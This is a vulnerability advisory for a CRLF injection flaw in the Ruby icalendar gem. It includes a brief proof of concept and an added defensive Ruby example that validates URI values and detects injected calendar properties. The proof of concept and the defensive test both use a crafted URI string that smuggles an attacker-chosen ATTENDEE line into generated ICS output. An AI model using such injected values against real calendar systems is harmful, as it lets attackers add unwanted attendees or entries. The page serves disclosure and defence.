Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade icalendar to version 2.12.2 or higher.
icalendar is a Ruby implementation of the iCalendar specification (RFC 5545). It allows for the generation and parsing of .ics files, which are used by a variety of calendaring applications.
Affected versions of this package are vulnerable to CRLF Injection via the serialization process of URI property values due to improper sanitization of input. An attacker can inject arbitrary calendar lines into generated ICS files by supplying input containing CRLF characters, which are embedded directly into the output and interpreted as new properties or components by downstream calendar clients.
# Proof of concept from the advisory: a URI value containing CRLF is serialized unchanged,
# so the text after the line break is emitted as a second, attacker-chosen content line.
require "icalendar/value"
require "icalendar/values/uri"
v = Icalendar::Values::Uri.new("https://a.example/ok\r\nATTENDEE:mailto:evil@example.com")
# Prints the URI value followed by an injected ATTENDEE line on affected versions
puts v.to_ical(Icalendar::Values::Text)
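The following is an added example written for this page, not code from the Snyk advisory or the icalendar gem. It shows both sides of the defence for the flaw described above: an input-side check that rejects any URI value carrying control characters (the CR/LF that terminate an RFC 5545 content line) before it reaches a serializer, and an output-side check that unfolds generated ICS text and reports property names the application never intended to emit. The http(s)-only policy in safe_ics_uri and the property names are assumptions for the example; the naive serializer is a stand-in for the behaviour described, not the gem's own code.

```ruby
require "uri"

# Any C0 control (including CR and LF) or DEL: none of these belong in a URI
# property value, and CR/LF would terminate the content line.
CONTROL_CHARS = /[\x00-\x1f\x7f]/

class UnsafeUriValue < ArgumentError; end

# Validate an untrusted value before it becomes the value of a URL/URI property.
# Returns the value unchanged if it is a clean absolute http(s) URI, else raises.
# (http(s)-only is an assumed application policy for this example.)
def safe_ics_uri(value)
  s = value.to_s
  raise UnsafeUriValue, "control character in URI value" if s.match?(CONTROL_CHARS)
  uri = begin
    URI.parse(s)
  rescue URI::InvalidURIError
    nil
  end
  raise UnsafeUriValue, "not an absolute http(s) URI" unless uri.is_a?(URI::HTTP) && uri.host
  s
end

# Naive serializer in the shape of the flaw described above: the value is
# interpolated straight into the content line (stand-in, not the gem's code).
def naive_url_line(value)
  "URL:#{value}\r\n"
end

# Hardened serializer: refuses anything that is not a clean URI.
def hardened_url_line(value)
  "URL:#{safe_ics_uri(value)}\r\n"
end

# RFC 5545 section 3.1: content lines are CRLF-delimited, and a line starting
# with SPACE or HTAB continues the previous one. Unfold before inspecting.
def unfold(ics)
  ics.gsub(/\r\n[ \t]/, "")
end

# Output-side check: list property names present in the ICS text that the
# caller did not intend to emit. An injected line shows up here.
def unexpected_properties(ics, expected_names)
  allowed = expected_names.map(&:upcase)
  unfold(ics).split("\r\n").filter_map do |line|
    name = line[/\A([A-Za-z0-9-]+)[;:]/, 1]
    next if name.nil?
    up = name.upcase
    up unless allowed.include?(up)
  end.uniq
end

if $PROGRAM_NAME == __FILE__
  # Constructed input: the same string the advisory's proof of concept uses.
  tainted = "https://a.example/ok\r\nATTENDEE:mailto:evil@example.com"
  puts naive_url_line(tainted).inspect
  p unexpected_properties(naive_url_line(tainted), %w[URL])
  begin
    hardened_url_line(tainted)
  rescue UnsafeUriValue => e
    puts "rejected: #{e.message}"
  end
end
```

Run as a script, the naive line shows two content lines where one was intended, the output check reports ATTENDEE as an unexpected property, and the hardened serializer rejects the value before anything is written. In an application the input check is the fix to apply at the boundary where user-supplied URLs enter calendar data; the output check is a cheap regression test or log-side detector for any serializer that is still on an affected version.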